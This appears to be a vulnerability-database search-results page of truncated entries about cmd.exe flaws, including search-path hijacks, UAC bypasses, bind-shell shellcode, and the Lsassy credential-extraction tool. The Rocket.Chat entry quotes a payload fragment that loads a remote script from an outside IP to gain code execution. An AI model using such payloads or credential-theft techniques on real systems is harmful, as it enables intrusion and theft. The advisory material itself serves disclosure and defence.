208 matches found
Microsoft Windows cmd.exe Stack Buffer Overflow
Credits: John Page aka hyp3rlinx, malvuln + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt + twitter.com/hyp3rlinx + ISR: ApparitionSec Vendor www.microsoft.com Product cmd.exe is the default command-line...
CVE-2021-35448
Emote Interactive Remote Mouse 3.008 on Windows allows attackers to execute arbitrary programs as Administrator by using the Image Transfer Folder feature to navigate to cmd.exe. It binds to local ports to listen for incoming connections...
CVE-2021-35448
Emote Interactive Remote Mouse 3.008 on Windows allows attackers to execute arbitrary programs as Administrator by using the Image Transfer Folder feature to navigate to cmd.exe. It binds to local ports to listen for incoming connections...
Design/Logic Flaw
An unauthenticated attacker with physical access to a computer with NetSetMan Pro before 5.0 installed, that has the pre-logon profile switch button within the Windows logon screen enabled, is able to drop to an administrative shell and execute arbitrary commands as SYSTEM via the "save log to...
Local directory executable lookup in sops (Windows-only)
Impact Windows users using the sops direct editor option sops file.yaml can have a local executable named either vi, vim, or nano executed if running sops from cmd.exe This attack is only viable if an attacker is able to place a malicious binary within the directory you are running sops from. As...
Local directory executable lookup in sops (Windows-only)
Impact Windows users using the sops direct editor option sops file.yaml can have a local executable named either vi, vim, or nano executed if running sops from cmd.exe This attack is only viable if an attacker is able to place a malicious binary within the directory you are running sops from. As...
Exploit for Improper Privilege Management in Microsoft
CVE-2019-1388 CVE-2019-1388 Abuse UAC Windows Certific...
Code injection
LiveCode v9.6.1 on Windows allows local, low-privileged users to gain privileges by creating a malicious "cmd.exe" in the folder of the vulnerable LiveCode application. If the application is using LiveCode's "shell" function, it will attempt to search for "cmd.exe" in the folder of the current...
CVE-2020-26894
Affected software: LiveCode v9.6.1 on Windows. Vulnerability: local privilege escalation via a malicious cmd.exe placed in the vulnerable app’s folder; when using LiveCode's shell(), the app may search that folder and execute cmd.exe. Root cause: insecure handling of an external executable in the...
ezEmu - Simple Execution Of Commands For Defensive Tuning/Research
ezEmu enables users to test adversary behaviors via various execution techniques. Sort of like an "offensive framework for blue teamers ", ezEmu does not have any networking/C2 capabilities and rather focuses on creating local test telemetry. Windows See /Linux for ELF ezEmu is compiled as...
Rocket.Chat: Remote Code Execution in Rocket.Chat-Desktop
Description: Rocket.Chat-Desktop is vulnerable to remote code execution. An attacker is able to create new BrowserWindow instances with a malicious preload script. Releases Affected: Rocket.Chat-Desktop-Client: PWNED', '', 'nodeIntegration=true', 'preload=\\45.155.173.235\data\cmd.js'.join','...
Microsoft Windows Unsafe Handling Practices
Hi @ll, This multi-part post can be read even without a MIME-compliant program! Back in 2014, I reported a vulnerability in CreateProcess's handling of .cmd and .bat files that Microsoft fixed with MS14-019 alias MSKB 2922229 and assigned CVE-2014-0315: command lines with a batch script as first...
CVE-2020-4019
The file editing functionality in the Atlassian Companion App before version 1.0.0 allows local attackers to have the app run a different executable in place of the app's cmd.exe via a untrusted search path vulnerability...
Design/Logic Flaw
The file editing functionality in the Atlassian Companion App before version 1.0.0 allows local attackers to have the app run a different executable in place of the app's cmd.exe via a untrusted search path vulnerability...
Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)
Shellcode Title: Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode 571 Bytes Shellcode Author: Bobby Cooke Technique: PEB & Export Directory Table Tested On: Windows 10 Pro x86 10.0.18363 Build 18363 Shellcode Function: When executed, this shellcode creates a cmd.exe bind shell, using the...
Lsassy - Extract Credentials From Lsass Remotely
Python library to remotely extract credentials. This blog post explains how it works. You can check the wiki This library uses impacket project to remotely read necessary bytes in lsass dump and pypykatz to extract credentials. Requirements Python = 3.6 pypykatz = 0.3.0 impacket Installation From...
Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass)
Microsoft Windows 10 build 1809 - Local Privilege Escalation UAC Bypass Exploit Title: Microsoft Windows 10 - Local Privilege Escalation UAC Bypass Author: Nassim Asrir Date: 2019-01-10 Exploit Author: Nassim Asrir CVE: N/A Tested On: Windows 10Pro 1809 Vendor : https://www.microsoft.com Technica...
Exploit for Improper Privilege Management in Microsoft
CVE-20190-1215 ws2ifsl.sys UAF exploit for Windows 10 19H1 x64...
CVE-2019-17664
NSA Ghidra through 9.0.4 uses a potentially untrusted search path. When executing Ghidra from a given path, the Java process working directory is set to this path. Then, when launching the Python interpreter via the "Ghidra Codebrowser Window Python" option, Ghidra will try to execute the cmd.exe...
CVE-2019-17664
CVE-2019-17664 affects NSA Ghidra up to 9.0.4, where the Java process working directory is set to the user-provided path. When launching the Python interpreter from Ghidra CodeBrowser > Window > Python, Ghidra attempts to execute cmd.exe from that working directory due to a potentially untr...